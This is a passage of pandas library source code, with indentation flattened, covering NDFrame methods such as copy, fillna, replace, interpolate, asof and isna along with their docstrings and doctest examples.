When ``deep=False``, a new object will be created without copying
the calling object's data or index (only references to the data
and index are copied). Any changes to the data of the original
will be reflected in the shallow copy (and vice versa).
Parameters
----------
deep : bool, default True
Make a deep copy, including a copy of the data and the indices.
With ``deep=False`` neither the indices nor the data are copied.
Returns
-------
copy : Series, DataFrame or Panel
Object type matches caller.
Notes
-----
When ``deep=True``, data is copied but actual Python objects
will not be copied recursively, only the reference to the object.
This is in contrast to `copy.deepcopy` in the Standard Library,
which recursively copies object data (see examples below).
While ``Index`` objects are copied when ``deep=True``, the underlying
numpy array is not copied for performance reasons. Since ``Index`` is
immutable, the underlying data can be safely shared and a copy
is not needed.
Examples
--------
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> s
a 1
b 2
dtype: int64
>>> s_copy = s.copy()
>>> s_copy
a 1
b 2
dtype: int64
**Shallow copy versus default (deep) copy:**
>>> s = pd.Series([1, 2], index=["a", "b"])
>>> deep = s.copy()
>>> shallow = s.copy(deep=False)
Shallow copy shares data and index with original.
>>> s is shallow
False
>>> s.values is shallow.values and s.index is shallow.index
True
Deep copy has own copy of data and index.
>>> s is deep
False
>>> s.values is deep.values or s.index is deep.index
False
Updates to the data shared by shallow copy and original is reflected
in both; deep copy remains unchanged.
>>> s[0] = 3
>>> shallow[1] = 4
>>> s
a 3
b 4
dtype: int64
>>> shallow
a 3
b 4
dtype: int64
>>> deep
a 1
b 2
dtype: int64
Note that when copying an object containing Python objects, a deep copy
will copy the data, but will not do so recursively. Updating a nested
data object will be reflected in the deep copy.
>>> s = pd.Series([[1, 2], [3, 4]])
>>> deep = s.copy()
>>> s[0][0] = 10
>>> s
0 [10, 2]
1 [3, 4]
dtype: object
>>> deep
0 [10, 2]
1 [3, 4]
dtype: object
"""
data = self._data.copy(deep=deep)
return self._constructor(data).__finalize__(self)
def __copy__(self, deep=True):
return self.copy(deep=deep)
def __deepcopy__(self, memo=None):
if memo is None:
memo = {}
return self.copy(deep=True)
def _convert(self, datetime=False, numeric=False, timedelta=False,
coerce=False, copy=True):
"""
Attempt to infer better dtype for object columns
Parameters
----------
datetime : boolean, default False
If True, convert to date where possible.
numeric : boolean, default False
If True, attempt to convert to numbers (including strings), with
unconvertible values becoming NaN.
timedelta : boolean, default False
If True, convert to timedelta where possible.
coerce : boolean, default False
If True, force conversion with unconvertible values converted to
nulls (NaN or NaT)
copy : boolean, default True
If True, return a copy even if no copy is necessary (e.g. no
conversion was done). Note: This is meant for internal use, and
should not be confused with inplace.
Returns
-------
converted : same as input object
"""
return self._constructor(
self._data.convert(datetime=datetime, numeric=numeric,
timedelta=timedelta, coerce=coerce,
copy=copy)).__finalize__(self)
def convert_objects(self, convert_dates=True, convert_numeric=False,
convert_timedeltas=True, copy=True):
"""Attempt to infer better dtype for object columns.
.. deprecated:: 0.21.0
Parameters
----------
convert_dates : boolean, default True
If True, convert to date where possible. If 'coerce', force
conversion, with unconvertible values becoming NaT.
convert_numeric : boolean, default False
If True, attempt to coerce to numbers (including strings), with
unconvertible values becoming NaN.
convert_timedeltas : boolean, default True
If True, convert to timedelta where possible. If 'coerce', force
conversion, with unconvertible values becoming NaT.
copy : boolean, default True
If True, return a copy even if no copy is necessary (e.g. no
conversion was done). Note: This is meant for internal use, and
should not be confused with inplace.
See Also
--------
pandas.to_datetime : Convert argument to datetime.
pandas.to_timedelta : Convert argument to timedelta.
pandas.to_numeric : Convert argument to a numeric type.
Returns
-------
converted : same as input object
"""
msg = ("convert_objects is deprecated. To re-infer data dtypes for "
"object columns, use {klass}.infer_objects()\nFor all "
"other conversions use the data-type specific converters "
"pd.to_datetime, pd.to_timedelta and pd.to_numeric."
).format(klass=self.__class__.__name__)
warnings.warn(msg, FutureWarning, stacklevel=2)
return self._constructor(
self._data.convert(convert_dates=convert_dates,
convert_numeric=convert_numeric,
convert_timedeltas=convert_timedeltas,
copy=copy)).__finalize__(self)
def infer_objects(self):
"""
Attempt to infer better dtypes for object columns.
Attempts soft conversion of object-dtyped
columns, leaving non-object and unconvertible
columns unchanged. The inference rules are the
same as during normal Series/DataFrame construction.
.. versionadded:: 0.21.0
See Also
--------
pandas.to_datetime : Convert argument to datetime.
pandas.to_timedelta : Convert argument to timedelta.
pandas.to_numeric : Convert argument to a numeric type.
Returns
-------
converted : same type as input object
Examples
--------
>>> df = pd.DataFrame({"A": ["a", 1, 2, 3]})
>>> df = df.iloc[1:]
>>> df
A
1 1
2 2
3 3
>>> df.dtypes
A object
dtype: object
>>> df.infer_objects().dtypes
A int64
dtype: object
"""
# numeric=False necessary to only soft convert;
# python objects will still be converted to
# native numpy numeric types
return self._constructor(
self._data.convert(datetime=True, numeric=False,
timedelta=True, coerce=False,
copy=True)).__finalize__(self)
# ----------------------------------------------------------------------
# Filling NA's
_shared_docs['fillna'] = ("""
Fill NA/NaN values using the specified method
Parameters
----------
value : scalar, dict, Series, or DataFrame
Value to use to fill holes (e.g. 0), alternately a
dict/Series/DataFrame of values specifying which value to use for
each index (for a Series) or column (for a DataFrame). (values not
in the dict/Series/DataFrame will not be filled). This value cannot
be a list.
method : {'backfill', 'bfill', 'pad', 'ffill', None}, default None
Method to use for filling holes in reindexed Series
pad / ffill: propagate last valid observation forward to next valid
backfill / bfill: use NEXT valid observation to fill gap
axis : %(axes_single_arg)s
inplace : boolean, default False
If True, fill in place. Note: this will modify any
other views on this object, (e.g. a no-copy slice for a column in a
DataFrame).
limit : int, default None
If method is specified, this is the maximum number of consecutive
NaN values to forward/backward fill. In other words, if there is
a gap with more than this number of consecutive NaNs, it will only
be partially filled. If method is not specified, this is the
maximum number of entries along the entire axis where NaNs will be
filled. Must be greater than 0 if not None.
downcast : dict, default is None
a dict of item->dtype of what to downcast if possible,
or the string 'infer' which will try to downcast to an appropriate
equal type (e.g. float64 to int64 if possible)
See Also
--------
reindex, asfreq
Returns
-------
filled : %(klass)s
Examples
--------
>>> df = pd.DataFrame([[np.nan, 2, np.nan, 0],
... [3, 4, np.nan, 1],
... [np.nan, np.nan, np.nan, 5],
... [np.nan, 3, np.nan, 4]],
... columns=list('ABCD'))
>>> df
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 NaN NaN NaN 5
3 NaN 3.0 NaN 4
Replace all NaN elements with 0s.
>>> df.fillna(0)
A B C D
0 0.0 2.0 0.0 0
1 3.0 4.0 0.0 1
2 0.0 0.0 0.0 5
3 0.0 3.0 0.0 4
We can also propagate non-null values forward or backward.
>>> df.fillna(method='ffill')
A B C D
0 NaN 2.0 NaN 0
1 3.0 4.0 NaN 1
2 3.0 4.0 NaN 5
3 3.0 3.0 NaN 4
Replace all NaN elements in column 'A', 'B', 'C', and 'D', with 0, 1,
2, and 3 respectively.
>>> values = {'A': 0, 'B': 1, 'C': 2, 'D': 3}
>>> df.fillna(value=values)
A B C D
0 0.0 2.0 2.0 0
1 3.0 4.0 2.0 1
2 0.0 1.0 2.0 5
3 0.0 3.0 2.0 4
Only replace the first NaN element.
>>> df.fillna(value=values, limit=1)
A B C D
0 0.0 2.0 2.0 0
1 3.0 4.0 NaN 1
2 NaN 1.0 NaN 5
3 NaN 3.0 NaN 4
""")
@Appender(_shared_docs['fillna'] % _shared_doc_kwargs)
def fillna(self, value=None, method=None, axis=None, inplace=False,
limit=None, downcast=None):
inplace = validate_bool_kwarg(inplace, 'inplace')
value, method = validate_fillna_kwargs(value, method)
self._consolidate_inplace()
# set the default here, so functions examining the signature
# can detect if something was set (e.g. in groupby) (GH9221)
if axis is None:
axis = 0
axis = self._get_axis_number(axis)
from pandas import DataFrame
if value is None:
if self._is_mixed_type and axis == 1:
if inplace:
raise NotImplementedError()
result = self.T.fillna(method=method, limit=limit).T
# need to downcast here because of all of the transposes
result._data = result._data.downcast()
return result
# > 3d
if self.ndim > 3:
raise NotImplementedError('Cannot fillna with a method for > '
'3dims')
# 3d
elif self.ndim == 3:
# fill in 2d chunks
result = {col: s.fillna(method=method, value=value)
for col, s in self.iteritems()}
new_obj = self._constructor.\
from_dict(result).__finalize__(self)
new_data = new_obj._data
else:
# 2d or less
new_data = self._data.interpolate(method=method, axis=axis,
limit=limit, inplace=inplace,
coerce=True,
downcast=downcast)
else:
if len(self._get_axis(axis)) == 0:
return self
if self.ndim == 1:
if isinstance(value, (dict, ABCSeries)):
from pandas import Series
value = Series(value)
elif not is_list_like(value):
pass
else:
raise TypeError('"value" parameter must be a scalar, dict '
'or Series, but you passed a '
'"{0}"'.format(type(value).__name__))
new_data = self._data.fillna(value=value, limit=limit,
inplace=inplace,
downcast=downcast)
elif isinstance(value, (dict, ABCSeries)):
if axis == 1:
raise NotImplementedError('Currently only can fill '
'with dict/Series column '
'by column')
result = self if inplace else self.copy()
for k, v in compat.iteritems(value):
if k not in result:
continue
obj = result[k]
obj.fillna(v, limit=limit, inplace=True, downcast=downcast)
return result if not inplace else None
elif not is_list_like(value):
new_data = self._data.fillna(value=value, limit=limit,
inplace=inplace,
downcast=downcast)
elif isinstance(value, DataFrame) and self.ndim == 2:
new_data = self.where(self.notna(), value)
else:
raise ValueError("invalid fill value with a %s" % type(value))
if inplace:
self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
def ffill(self, axis=None, inplace=False, limit=None, downcast=None):
"""
Synonym for :meth:`DataFrame.fillna(method='ffill') <DataFrame.fillna>`
"""
return self.fillna(method='ffill', axis=axis, inplace=inplace,
limit=limit, downcast=downcast)
def bfill(self, axis=None, inplace=False, limit=None, downcast=None):
"""
Synonym for :meth:`DataFrame.fillna(method='bfill') <DataFrame.fillna>`
"""
return self.fillna(method='bfill', axis=axis, inplace=inplace,
limit=limit, downcast=downcast)
_shared_docs['replace'] = ("""
Replace values given in 'to_replace' with 'value'.
Parameters
----------
to_replace : str, regex, list, dict, Series, numeric, or None
* numeric, str or regex:
- numeric: numeric values equal to ``to_replace`` will be
replaced with ``value``
- str: string exactly matching ``to_replace`` will be replaced
with ``value``
- regex: regexs matching ``to_replace`` will be replaced with
``value``
* list of str, regex, or numeric:
- First, if ``to_replace`` and ``value`` are both lists, they
**must** be the same length.
- Second, if ``regex=True`` then all of the strings in **both**
lists will be interpreted as regexs otherwise they will match
directly. This doesn't matter much for ``value`` since there
are only a few possible substitution regexes you can use.
- str, regex and numeric rules apply as above.
* dict:
- Dicts can be used to specify different replacement values
for different existing values. For example,
{'a': 'b', 'y': 'z'} replaces the value 'a' with 'b' and
'y' with 'z'. To use a dict in this way the ``value``
parameter should be ``None``.
- For a DataFrame a dict can specify that different values
should be replaced in different columns. For example,
{'a': 1, 'b': 'z'} looks for the value 1 in column 'a' and
the value 'z' in column 'b' and replaces these values with
whatever is specified in ``value``. The ``value`` parameter
should not be ``None`` in this case. You can treat this as a
special case of passing two lists except that you are
specifying the column to search in.
- For a DataFrame nested dictionaries, e.g.,
{'a': {'b': np.nan}}, are read as follows: look in column 'a'
for the value 'b' and replace it with NaN. The ``value``
parameter should be ``None`` to use a nested dict in this
way. You can nest regular expressions as well. Note that
column names (the top-level dictionary keys in a nested
dictionary) **cannot** be regular expressions.
* None:
- This means that the ``regex`` argument must be a string,
compiled regular expression, or list, dict, ndarray or Series
of such elements. If ``value`` is also ``None`` then this
**must** be a nested dictionary or ``Series``.
See the examples section for examples of each of these.
value : scalar, dict, list, str, regex, default None
Value to replace any values matching ``to_replace`` with.
For a DataFrame a dict of values can be used to specify which
value to use for each column (columns not in the dict will not be
filled). Regular expressions, strings and lists or dicts of such
objects are also allowed.
inplace : boolean, default False
If True, perform the replacement in place. Note: this will modify any
other views on this object (e.g. a column from a DataFrame).
Returns the caller if this is True.
limit : int, default None
Maximum size gap to forward or backward fill
regex : bool or same types as ``to_replace``, default False
Whether to interpret ``to_replace`` and/or ``value`` as regular
expressions. If this is ``True`` then ``to_replace`` *must* be a
string. Alternatively, this could be a regular expression or a
list, dict, or array of regular expressions in which case
``to_replace`` must be ``None``.
method : string, optional, {'pad', 'ffill', 'bfill'}
The method to use for replacement, when ``to_replace`` is a
scalar, list or tuple and ``value`` is None.
.. versionchanged:: 0.23.0
Added to DataFrame
See Also
--------
%(klass)s.fillna : Fill NA/NaN values
%(klass)s.where : Replace values based on boolean condition
Returns
-------
filled : %(klass)s
Raises
------
AssertionError
* If ``regex`` is not a ``bool`` and ``to_replace`` is not
``None``.
TypeError
* If ``to_replace`` is a ``dict`` and ``value`` is not a ``list``,
``dict``, ``ndarray``, or ``Series``
* If ``to_replace`` is ``None`` and ``regex`` is not compilable
into a regular expression or is a list, dict, ndarray, or
Series.
* When replacing multiple ``bool`` or ``datetime64`` objects and
the arguments to ``to_replace`` does not match the type of the
value being replaced
ValueError
* If a ``list`` or an ``ndarray`` is passed to ``to_replace`` and
`value` but they are not the same length.
Notes
-----
* Regex substitution is performed under the hood with ``re.sub``. The
rules for substitution for ``re.sub`` are the same.
* Regular expressions will only substitute on strings, meaning you
cannot provide, for example, a regular expression matching floating
point numbers and expect the columns in your frame that have a
numeric dtype to be matched. However, if those floating point
numbers *are* strings, then you can do this.
* This method has *a lot* of options. You are encouraged to experiment
and play with this method to gain intuition about how it works.
Examples
--------
>>> s = pd.Series([0, 1, 2, 3, 4])
>>> s.replace(0, 5)
0 5
1 1
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame({'A': [0, 1, 2, 3, 4],
... 'B': [5, 6, 7, 8, 9],
... 'C': ['a', 'b', 'c', 'd', 'e']})
>>> df.replace(0, 5)
A B C
0 5 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace([0, 1, 2, 3], 4)
A B C
0 4 5 a
1 4 6 b
2 4 7 c
3 4 8 d
4 4 9 e
>>> df.replace([0, 1, 2, 3], [4, 3, 2, 1])
A B C
0 4 5 a
1 3 6 b
2 2 7 c
3 1 8 d
4 4 9 e
>>> s.replace([1, 2], method='bfill')
0 0
1 3
2 3
3 3
4 4
dtype: int64
>>> df.replace({0: 10, 1: 100})
A B C
0 10 5 a
1 100 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': 0, 'B': 5}, 100)
A B C
0 100 100 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': {0: 100, 4: 400}})
A B C
0 100 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 400 9 e
>>> df = pd.DataFrame({'A': ['bat', 'foo', 'bait'],
... 'B': ['abc', 'bar', 'xyz']})
>>> df.replace(to_replace=r'^ba.$', value='new', regex=True)
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace({'A': r'^ba.$'}, {'A': 'new'}, regex=True)
A B
0 new abc
1 foo bar
2 bait xyz
>>> df.replace(regex=r'^ba.$', value='new')
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace(regex={r'^ba.$':'new', 'foo':'xyz'})
A B
0 new abc
1 xyz new
2 bait xyz
>>> df.replace(regex=[r'^ba.$', 'foo'], value='new')
A B
0 new abc
1 new new
2 bait xyz
Note that when replacing multiple ``bool`` or ``datetime64`` objects,
the data types in the ``to_replace`` parameter must match the data
type of the value being replaced:
>>> df = pd.DataFrame({'A': [True, False, True],
... 'B': [False, True, False]})
>>> df.replace({'a string': 'new value', True: False}) # raises
TypeError: Cannot compare types 'ndarray(dtype=bool)' and 'str'
This raises a ``TypeError`` because one of the ``dict`` keys is not of
the correct type for replacement.
""")
@Appender(_shared_docs['replace'] % _shared_doc_kwargs)
def replace(self, to_replace=None, value=None, inplace=False, limit=None,
regex=False, method='pad', axis=None):
inplace = validate_bool_kwarg(inplace, 'inplace')
if not is_bool(regex) and to_replace is not None:
raise AssertionError("'to_replace' must be 'None' if 'regex' is "
"not a bool")
if axis is not None:
warnings.warn('the "axis" argument is deprecated '
'and will be removed in '
'v0.13; this argument has no effect')
self._consolidate_inplace()
if value is None:
# passing a single value that is scalar like
# when value is None (GH5319), for compat
if not is_dict_like(to_replace) and not is_dict_like(regex):
to_replace = [to_replace]
if isinstance(to_replace, (tuple, list)):
if isinstance(self, pd.DataFrame):
return self.apply(_single_replace,
args=(to_replace, method, inplace,
limit))
return _single_replace(self, to_replace, method, inplace,
limit)
if not is_dict_like(to_replace):
if not is_dict_like(regex):
raise TypeError('If "to_replace" and "value" are both None'
' and "to_replace" is not a list, then '
'regex must be a mapping')
to_replace = regex
regex = True
items = list(compat.iteritems(to_replace))
keys, values = lzip(*items) or ([], [])
are_mappings = [is_dict_like(v) for v in values]
if any(are_mappings):
if not all(are_mappings):
raise TypeError("If a nested mapping is passed, all values"
" of the top level mapping must be "
"mappings")
# passed a nested dict/Series
to_rep_dict = {}
value_dict = {}
for k, v in items:
keys, values = lzip(*v.items()) or ([], [])
if set(keys) & set(values):
raise ValueError("Replacement not allowed with "
"overlapping keys and values")
to_rep_dict[k] = list(keys)
value_dict[k] = list(values)
to_replace, value = to_rep_dict, value_dict
else:
to_replace, value = keys, values
return self.replace(to_replace, value, inplace=inplace,
limit=limit, regex=regex)
else:
# need a non-zero len on all axes
for a in self._AXIS_ORDERS:
if not len(self._get_axis(a)):
return self
new_data = self._data
if is_dict_like(to_replace):
if is_dict_like(value): # {'A' : NA} -> {'A' : 0}
res = self if inplace else self.copy()
for c, src in compat.iteritems(to_replace):
if c in value and c in self:
# object conversion is handled in
# series.replace which is called recursively
res[c] = res[c].replace(to_replace=src,
value=value[c],
inplace=False,
regex=regex)
return None if inplace else res
# {'A': NA} -> 0
elif not is_list_like(value):
keys = [(k, src) for k, src in compat.iteritems(to_replace)
if k in self]
keys_len = len(keys) - 1
for i, (k, src) in enumerate(keys):
convert = i == keys_len
new_data = new_data.replace(to_replace=src,
value=value,
filter=[k],
inplace=inplace,
regex=regex,
convert=convert)
else:
raise TypeError('value argument must be scalar, dict, or '
'Series')
elif is_list_like(to_replace): # [NA, ''] -> [0, 'missing']
if is_list_like(value):
if len(to_replace) != len(value):
raise ValueError('Replacement lists must match '
'in length. Expecting %d got %d ' %
(len(to_replace), len(value)))
new_data = self._data.replace_list(src_list=to_replace,
dest_list=value,
inplace=inplace,
regex=regex)
else: # [NA, ''] -> 0
new_data = self._data.replace(to_replace=to_replace,
value=value, inplace=inplace,
regex=regex)
elif to_replace is None:
if not (is_re_compilable(regex) or
is_list_like(regex) or is_dict_like(regex)):
raise TypeError("'regex' must be a string or a compiled "
"regular expression or a list or dict of "
"strings or regular expressions, you "
"passed a"
" {0!r}".format(type(regex).__name__))
return self.replace(regex, value, inplace=inplace, limit=limit,
regex=True)
else:
# dest iterable dict-like
if is_dict_like(value): # NA -> {'A' : 0, 'B' : -1}
new_data = self._data
for k, v in compat.iteritems(value):
if k in self:
new_data = new_data.replace(to_replace=to_replace,
value=v, filter=[k],
inplace=inplace,
regex=regex)
elif not is_list_like(value): # NA -> 0
new_data = self._data.replace(to_replace=to_replace,
value=value, inplace=inplace,
regex=regex)
else:
msg = ('Invalid "to_replace" type: '
'{0!r}').format(type(to_replace).__name__)
raise TypeError(msg) # pragma: no cover
if inplace:
self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
_shared_docs['interpolate'] = """
Please note that only ``method='linear'`` is supported for
DataFrames/Series with a MultiIndex.
Parameters
----------
method : {'linear', 'time', 'index', 'values', 'nearest', 'zero',
'slinear', 'quadratic', 'cubic', 'barycentric', 'krogh',
'polynomial', 'spline', 'piecewise_polynomial',
'from_derivatives', 'pchip', 'akima'}
* 'linear': ignore the index and treat the values as equally
spaced. This is the only method supported on MultiIndexes.
This is the default method.
* 'time': interpolation works on daily and higher resolution
data to interpolate given length of interval
* 'index', 'values': use the actual numerical values of the index
* 'nearest', 'zero', 'slinear', 'quadratic', 'cubic',
'barycentric', 'polynomial' is passed to
``scipy.interpolate.interp1d``. Both 'polynomial' and 'spline'
require that you also specify an `order` (int),
e.g. df.interpolate(method='polynomial', order=4).
These use the actual numerical values of the index.
* 'krogh', 'piecewise_polynomial', 'spline', 'pchip' and 'akima'
are all wrappers around the scipy interpolation methods of
similar names. These use the actual numerical values of the
index. For more information on their behavior, see the
`scipy documentation
<http://docs.scipy.org/doc/scipy/reference/interpolate.html#univariate-interpolation>`__
and `tutorial documentation
<http://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html>`__
* 'from_derivatives' refers to BPoly.from_derivatives which
replaces 'piecewise_polynomial' interpolation method in
scipy 0.18
.. versionadded:: 0.18.1
Added support for the 'akima' method
Added interpolate method 'from_derivatives' which replaces
'piecewise_polynomial' in scipy 0.18; backwards-compatible with
scipy < 0.18
axis : {0, 1}, default 0
* 0: fill column-by-column
* 1: fill row-by-row
limit : int, default None.
Maximum number of consecutive NaNs to fill. Must be greater than 0.
limit_direction : {'forward', 'backward', 'both'}, default 'forward'
limit_area : {'inside', 'outside'}, default None
* None: (default) no fill restriction
* 'inside' Only fill NaNs surrounded by valid values (interpolate).
* 'outside' Only fill NaNs outside valid values (extrapolate).
If limit is specified, consecutive NaNs will be filled in this
direction.
.. versionadded:: 0.21.0
inplace : bool, default False
Update the NDFrame in place if possible.
downcast : optional, 'infer' or None, defaults to None
Downcast dtypes if possible.
kwargs : keyword arguments to pass on to the interpolating function.
Returns
-------
Series or DataFrame of same shape interpolated at the NaNs
See Also
--------
reindex, replace, fillna
Examples
--------
Filling in NaNs
>>> s = pd.Series([0, 1, np.nan, 3])
>>> s.interpolate()
0 0
1 1
2 2
3 3
dtype: float64
"""
@Appender(_shared_docs['interpolate'] % _shared_doc_kwargs)
def interpolate(self, method='linear', axis=0, limit=None, inplace=False,
limit_direction='forward', limit_area=None,
downcast=None, **kwargs):
"""
Interpolate values according to different methods.
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
if self.ndim > 2:
raise NotImplementedError("Interpolate has not been implemented "
"on Panel and Panel 4D objects.")
if axis == 0:
ax = self._info_axis_name
_maybe_transposed_self = self
elif axis == 1:
_maybe_transposed_self = self.T
ax = 1
else:
_maybe_transposed_self = self
ax = _maybe_transposed_self._get_axis_number(ax)
if _maybe_transposed_self.ndim == 2:
alt_ax = 1 - ax
else:
alt_ax = ax
if (isinstance(_maybe_transposed_self.index, MultiIndex) and
method != 'linear'):
raise ValueError("Only `method=linear` interpolation is supported "
"on MultiIndexes.")
if _maybe_transposed_self._data.get_dtype_counts().get(
'object') == len(_maybe_transposed_self.T):
raise TypeError("Cannot interpolate with all NaNs.")
# create/use the index
if method == 'linear':
# prior default
index = np.arange(len(_maybe_transposed_self._get_axis(alt_ax)))
else:
index = _maybe_transposed_self._get_axis(alt_ax)
if isna(index).any():
raise NotImplementedError("Interpolation with NaNs in the index "
"has not been implemented. Try filling "
"those NaNs before interpolating.")
data = _maybe_transposed_self._data
new_data = data.interpolate(method=method, axis=ax, index=index,
values=_maybe_transposed_self, limit=limit,
limit_direction=limit_direction,
limit_area=limit_area,
inplace=inplace, downcast=downcast,
**kwargs)
if inplace:
if axis == 1:
new_data = self._constructor(new_data).T._data
self._update_inplace(new_data)
else:
res = self._constructor(new_data).__finalize__(self)
if axis == 1:
res = res.T
return res
# ----------------------------------------------------------------------
# Timeseries Methods
def asof(self, where, subset=None):
"""
Return the last row(s) without any NaN before `where`.
The last row without any NaN is taken (or the last row without
NaN considering only the subset of columns in the case of a DataFrame)
.. versionadded:: 0.19.0 For DataFrame
If there is no good value, NaN is returned for a Series, or
a Series of NaN values for a DataFrame.
Parameters
----------
where : date or array of dates
subset : string or list of strings, default None
if not None use these columns for NaN propagation
Notes
-----
Dates are assumed to be sorted
Raises if this is not the case
Returns
-------
where is scalar
- value or NaN if input is Series
- Series if input is DataFrame
where is Index: same shape object as input
See Also
--------
merge_asof
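Examples
--------
A small illustrative example using a constructed Series with a sorted
numeric index (expected output shown; a scalar ``where`` returns a
scalar, and the NaN at label 30 is skipped in favour of the last
valid value):
>>> s = pd.Series([1, 2, np.nan, 4], index=[10, 20, 30, 40])
>>> s.asof(20)
2.0
>>> s.asof(30)
2.0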
"""
if isinstance(where, compat.string_types):
from pandas import to_datetime
where = to_datetime(where)
if not self.index.is_monotonic:
raise ValueError("asof requires a sorted index")
is_series = isinstance(self, ABCSeries)
if is_series:
if subset is not None:
raise ValueError("subset is not valid for Series")
elif self.ndim > 2:
raise NotImplementedError("asof is not implemented "
"for {type}".format(type=type(self)))
else:
if subset is None:
subset = self.columns
if not is_list_like(subset):
subset = [subset]
is_list = is_list_like(where)
if not is_list:
start = self.index[0]
if isinstance(self.index, PeriodIndex):
where = Period(where, freq=self.index.freq).ordinal
start = start.ordinal
if where < start:
if not is_series:
from pandas import Series
return Series(index=self.columns, name=where)
return np.nan
# It's always much faster to use a *while* loop here for
# Series than pre-computing all the NAs. However a
# *while* loop is extremely expensive for DataFrame
# so we later pre-compute all the NAs and use the same
# code path whether *where* is a scalar or list.
# See PR: https://github.com/pandas-dev/pandas/pull/14476
if is_series:
loc = self.index.searchsorted(where, side='right')
if loc > 0:
loc -= 1
values = self._values
while loc > 0 and isna(values[loc]):
loc -= 1
return values[loc]
if not isinstance(where, Index):
where = Index(where) if is_list else Index([where])
nulls = self.isna() if is_series else self[subset].isna().any(1)
if nulls.all():
if is_series:
return self._constructor(np.nan, index=where, name=self.name)
elif is_list:
from pandas import DataFrame
return DataFrame(np.nan, index=where, columns=self.columns)
else:
from pandas import Series
return Series(np.nan, index=self.columns, name=where[0])
locs = self.index.asof_locs(where, ~(nulls.values))
# mask the missing
missing = locs == -1
data = self.take(locs, is_copy=False)
data.index = where
data.loc[missing] = np.nan
return data if is_list else data.iloc[-1]
# ----------------------------------------------------------------------
# Action Methods
_shared_docs['isna'] = """
Detect missing values.
Return a boolean same-sized object indicating if the values are NA.
NA values, such as None or :attr:`numpy.NaN`, get mapped to True
values.
Everything else gets mapped to False values. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.isnull : alias of isna
%(klass)s.notna : boolean inverse of isna
%(klass)s.dropna : omit axes labels with missing values
isna : top-level isna
Examples
--------
Show which entries in a DataFrame are NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.isna()
age born name toy
0 False True False True
1 False False False False
2 True False False False
Show which entries in a Series are NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.isna()
0 False
1 False
2 True
dtype: bool
"""
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
return isna(self).__finalize__(self)
@Appender(_shared_docs['isna'] % _shared_doc_kwargs)
def isnull(self):
return isna(self).__finalize__(self)
_shared_docs['notna'] = """
Detect existing (non-missing) values.
Return a boolean same-sized object indicating if the values are not NA.
Non-missing values get mapped to True. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
NA values, such as None or :attr:`numpy.NaN`, get mapped to False
values.
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.notnull : alias of notna
%(klass)s.isna : boolean inverse of notna
%(klass)s.dropna : omit axes labels with missing values
notna : top-level notna
Examples
--------
Show which entries in a DataFrame are not NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.notna()
age born name toy
0 True False True False
1 True True True True
2 False True True True
Show which entries in a Series are not NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.notna()
0 True
1 True
2 False
dtype: bool
"""
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
return notna(self).__finalize__(self)
@Appender(_shared_docs['notna'] % _shared_doc_kwargs)
def notnull(self):
return notna(self).__finalize__(self)
def _clip_with_scalar(self, lower, upper, inplace=False):
if ((lower is not None and np.any(isna(lower))) or
(upper is not None and np.any(isna(upper)))):
raise ValueError("Cannot use an NA value as a clip threshold")
result = self.values
mask = isna(result)
with np.errstate(all='ignore'):
if upper is not None:
result = np.where(result >= upper, upper, result)
if lower is not None:
result = np.where(result <= lower, lower, result)
if np.any(mask):
result[mask] = np.nan
axes_dict = self._construct_axes_dict()
result = self._constructor(result, **axes_dict).__finalize__(self)
if inplace:
self._update_inplace(result)
else:
return result
def _clip_with_one_bound(self, threshold, method, axis, inplace):
inplace = validate_bool_kwarg(inplace, 'inplace')
if axis is not None:
axis = self._get_axis_number(axis)
# method is self.le for upper bound and self.ge for lower bound
if is_scalar(threshold) and is_number(threshold):
if method.__name__ == 'le':
return self._clip_with_scalar(None, threshold, inplace=inplace)
return self._clip_with_scalar(threshold, None, inplace=inplace)
subset = method(threshold, axis=axis) | isna(self)
# GH #15390
# In order for where method to work, the threshold must
# be transformed to NDFrame from other array like structure.
if (not isinstance(threshold, ABCSeries)) and is_list_like(threshold):
if isinstance(self, ABCSeries):
threshold = pd.Series(threshold, index=self.index)
else:
threshold = _align_method_FRAME(self, np.asarray(threshold),
axis)
return self.where(subset, threshold, axis=axis, inplace=inplace)
def clip(self, lower=None, upper=None, axis=None, inplace=False,
